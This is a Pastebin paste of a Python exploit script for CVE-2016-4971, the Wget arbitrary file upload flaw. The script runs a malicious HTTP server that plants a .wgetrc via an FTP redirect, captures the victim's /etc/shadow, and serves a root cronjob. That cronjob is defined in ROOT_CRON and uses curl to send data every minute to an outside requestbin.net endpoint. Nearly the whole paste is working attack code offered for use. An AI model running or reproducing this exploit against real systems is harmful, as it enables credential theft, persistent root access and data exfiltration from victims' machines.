API tools faq
paste
Advertisement
Sp4sm

Untitled

Sp4sm
Apr 20th, 2018
101
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.00 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. #
  4. # Wget 1.18 < Arbitrary File Upload Exploit
  5. # Dawid Golunski
  6. # dawid( at )legalhackers.com
  7. #
  8. # http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
  9. #
  10. # CVE-2016-4971
  11. #
  12.  
  13. import SimpleHTTPServer
  14. import SocketServer
  15. import socket;
  16.  
  17. class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
  18. def do_GET(self):
  19. # This takes care of sending .wgetrc
  20.  
  21. print "We have a volunteer requesting " + self.path + " by GET :)\n"
  22. if "Wget" not in self.headers.getheader('User-Agent'):
  23. print "But it's not a Wget :("
  24. self.send_response(200)
  25. self.end_headers()
  26. self.wfile.write("Nothing to see here...")
  27. return
  28.  
  29. print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
  30. self.send_response(301)
  31. new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
  32. print "Sending redirect to %s \n"%(new_path)
  33. self.send_header('Location', new_path)
  34. self.end_headers()
  35.  
  36. def do_POST(self):
  37. # In here we will receive extracted file and install a PoC cronjob
  38.  
  39. print "We have a volunteer requesting " + self.path + " by POST :)\n"
  40. if "Wget" not in self.headers.getheader('User-Agent'):
  41. print "But it's not a Wget :( \n"
  42. self.send_response(200)
  43. self.end_headers()
  44. self.wfile.write("Nothing to see here...")
  45. return
  46.  
  47. content_len = int(self.headers.getheader('content-length', 0))
  48. post_body = self.rfile.read(content_len)
  49. print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
  50.  
  51. print "Sending back a cronjob script as a thank-you for the file..."
  52. print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
  53. self.send_response(200)
  54. self.send_header('Content-type', 'text/plain')
  55. self.end_headers()
  56. self.wfile.write(ROOT_CRON)
  57.  
  58. print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
  59.  
  60. return
  61.  
  62. def do_HEAD(self):
  63. self.do_GET()
  64. return
  65.  
  66. HTTP_LISTEN_IP = '192.168.56.40'
  67. HTTP_LISTEN_PORT = 80
  68. FTP_HOST = '192.168.56.40'
  69. FTP_PORT = 21
  70.  
  71. ROOT_CRON = "* * * * * root ls > lss.txt && curl -H 'Content-Type: text/xml' --data '@lss.txt' http://requestbin.net/r/1jwmnpq1 \n"
  72.  
  73. handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
  74.  
  75. print "Ready? Is your FTP server running?"
  76.  
  77. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  78. result = sock.connect_ex((FTP_HOST, FTP_PORT))
  79. if result == 0:
  80. print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
  81. else:
  82. print "FTP is down :( Exiting."
  83. exit(1)
  84.  
  85. print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
  86.  
  87. handler.serve_forever()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!